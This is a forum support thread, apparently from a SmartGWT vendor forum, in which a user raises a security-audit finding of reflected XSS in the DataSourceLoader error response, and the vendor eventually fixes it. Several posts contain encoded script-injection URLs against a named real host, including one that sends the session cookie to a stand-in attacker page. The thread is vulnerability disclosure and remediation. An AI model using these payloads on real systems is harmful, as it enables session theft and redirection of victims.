Announcement

Collapse
No announcement yet.
X
  • Filter
  • Time
Clear All
new posts

    #16
    I have tried using data source fields for combo box and it works fantastic. Please find the screen attached.

    Many thanks for your help
    Attached Files

    Comment


      #17
      We are going through our security audit. I am getting hit with XSS issue on my application. Is there a way I can set this for all my data source?

      Can I do set the escapeHTML=true in my DS? For each field?

      Thanks,

      Comment


        #18
        We don't have a single setting at the DataSource level that sets this property for all fields - you have to set it for each field you care about directly.

        Comment


          #19
          I have an application that is retrieving data and I am adding some additional filters on the retrieve. The URL that is generated by smartGWT to make this call is:

          https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3ealert(31337)%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI


          Our security team is saying that this URL has vunerbility. Can you help me fix this? Where do I have to decode all my variable...

          Thanks,

          Comment


            #20
            All this request is doing is sending names of DataSources to download, it isn't sending actual data. The only response the server can make from this request is the serialized forms of the named DataSources, which are defined securely on the server. Could you tell us what exactly the perceived vulnerability is?

            Comment


              #21
              Is there a way you can just from the framwork encode the URL string before we send it accross the wire?

              Comment


                #22
                This is not a security vulnerability and we do not plan any changes in this area. If you believe there is a vulnerability here, please provide a runnable sample of an exploit that is made possible because DataSource names are not encoded.

                Comment


                  #23
                  I am assuming the server code is validating the URL before it gets converted to an RMI call.

                  I Agree that it is not processing certain unacceptable values, but importantly the string should also disallow these characters:
                  < > -' "/ \ ( ) @ * to prevent script execution.

                  Comment


                    #24
                    There is no way for special characters to lead the script execution and RMI is not involved. Again, if you disagree, please provide exploit code.

                    Comment


                      #25
                      Step 1: The malicious user sends an email to the Halliburton user enticing him to navigate to the following URL:

                      https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

                      Note: Assuming http://www.google.com as a malicious page. In the wild, the attacker would replace it with his own page.

                      Step 2: The Halliburton user clicks the link and gets redirected to the attacker's malicious page.

                      Moreover, to escalate the attack, the attacker can also use document.cookie value to steal the user's current session ID. For example:

                      https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="http://malicious.com/steal.php?giveme=+'document.cookie'";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

                      Comment


                        #26
                        ?? This could only happen if the server were bouncing that encoded script back to the client for evaluation, which it will not do:

                        The only response the server can make from this request is the serialized forms of the named DataSources, which are defined securely on the server
                        If you actually try to browse to the link you are suggesting is an exploit, you will see that the server just complains that you haven't provided a proper dataSource parameter.

                        Comment


                          #27
                          The link below will redirect you to Google.com

                          https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

                          Comment


                            #28
                            I am not sure why by on the post of this message the URL is is posting with some spaces in them.

                            https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

                            Comment


                              #29
                              Obviously you are not replying to my query on this. However, we do have an issue and it be resolve at the framework level or at my level. Would you say running my criterias through an Htmlencoder will work?

                              I still think it may be easier on your side since you control the code. Another word if you add an overloaded function to encode the data that should takes care of everything.

                              Thanks,

                              Comment


                                #30
                                Ah, so the problem is specifically the error response for bad DataSource names. Please be more clear in the future as you originally reported this as some kind of issue with URL encoding and/or with how the framework loads DataSource (which is not a valid issue).

                                To prevent this, you can add error handling code to DataSourceLoader that does not send back a friendly response in the case of a missing DataSource. However we have just changed the framework to deal with this automatically, and the change will be present in the next nightly build.

                                Comment

                                Working...
                                X